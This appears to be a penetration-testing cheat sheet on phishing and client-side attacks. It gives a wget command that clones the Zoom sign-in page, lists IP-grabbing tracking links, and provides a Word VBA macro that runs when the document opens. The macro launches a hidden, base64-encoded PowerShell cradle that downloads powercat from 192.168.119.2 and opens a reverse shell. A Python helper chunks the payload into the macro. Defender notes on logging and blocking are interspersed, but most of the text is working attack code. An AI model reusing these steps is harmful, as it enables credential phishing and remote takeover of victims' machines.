Phishing & Client-Side Attacks

Phishing

Cloning a Legitimate Website

# Cloning the Zoom login page
#   -E             save HTML/CSS files with a matching file extension
#   -k / -K        rewrite links so the copy renders locally / keep the unconverted originals
#   -p             fetch page requisites (images, stylesheets, scripts)
#   -e robots=off  ignore robots.txt
#   -H -Dzoom.us   follow links to other hosts, limited to the zoom.us domain
#   -nd            store everything in a single directory
# Defender note: as written, the requests carry wget's default User-Agent and pull every
# page requisite in one burst, which the origin site's access logs can surface.
wget -E -k -K -p -e robots=off -H -Dzoom.us -nd "https://zoom.us/signin#/login"

Client-Side Attacks

Information Gathering

# Display metadata of a file
#   -a  keep duplicate tags instead of collapsing them
#   -u  also show tags exiftool does not recognise
# Defender note: this output is typically where authoring software, usernames and timestamps
# leak from published documents; stripping metadata before publication removes it.
exiftool -a -u brochure.pdf

# Extract info about the victim's browser and OS
https://canarytokens.com
https://grabify.link
https://github.com/fingerprintjs/fingerprintjs

Leveraging Microsoft Word Macros

# Use the .doc extension rather than .docx for macro documents: .docx files cannot store macros
# VBA Macro to run powershell
' Minimal macro: starts PowerShell through the Windows Script Host shell object.
' Defender note: this normally makes powershell.exe a child process of the Office
' application; the attack surface reduction rule "Block all Office applications from
' creating child processes" targets exactly that parent/child pair.
Sub MyMacro()
  ' Run launches the given command line; here it is just "powershell" with no arguments.
  CreateObject("Wscript.Shell").Run "powershell"
End Sub

# PS cradle that downloads powercat.ps1 over HTTP, runs it with IEX, then calls powercat to
# connect to 192.168.119.2 on port 4444 with powershell attached.
# To be passed to "powershell -enc", this text needs to be base64-encoded from its UTF-16LE bytes.
# Defender note: PowerShell script block logging (event ID 4104) records the decoded script
# text even when it arrives via -enc, and the plain-HTTP download is visible to network monitoring.
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

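# Python script used to split the base64-encoded string into smaller chunks.
# Each printed line is a VBA statement of the form: Str = Str + "<chunk>"
# The variable was previously named `str`, which shadowed Python's built-in str type.
command = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."
n = 50  # chunk length in characters
for i in range(0, len(command), n):
    print("Str = Str + " + '"' + command[i:i+n] + '"')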
# The full macro invoking PowerShell to create a reverse shell
' AutoOpen is run by Word when the document is opened; it only forwards to MyMacro.
' Defender note: this entry point does not fire while macros are disabled, and current
' Office builds block macros by default in files marked as downloaded from the internet.
Sub AutoOpen()
    MyMacro
End Sub

' Document_Open is Word's document-open event handler; like AutoOpen it only forwards
' to MyMacro, so the macro is reached through either entry point.
Sub Document_Open()
    MyMacro
End Sub

' Assembles the PowerShell command line from 50-character string pieces and runs it.
' In the command, -nop skips the profile, -w hidden hides the window and -enc supplies
' the script as base64 text.
' Defender note: an Office process starting powershell.exe with a hidden window and an
' encoded command is recorded by process-creation logging when command lines are
' captured (Security event 4688, Sysmon event 1).
Sub MyMacro()
    Dim Str As String
    
    ' Str starts empty, so each statement appends the next piece of the command.
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
        Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
        Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    ' The listing is truncated here: the middle pieces are omitted.
    ...
        Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
        Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
        Str = Str + "A== "

    ' Hands the assembled command line to the Windows Script Host shell object.
    CreateObject("Wscript.Shell").Run Str
End Sub
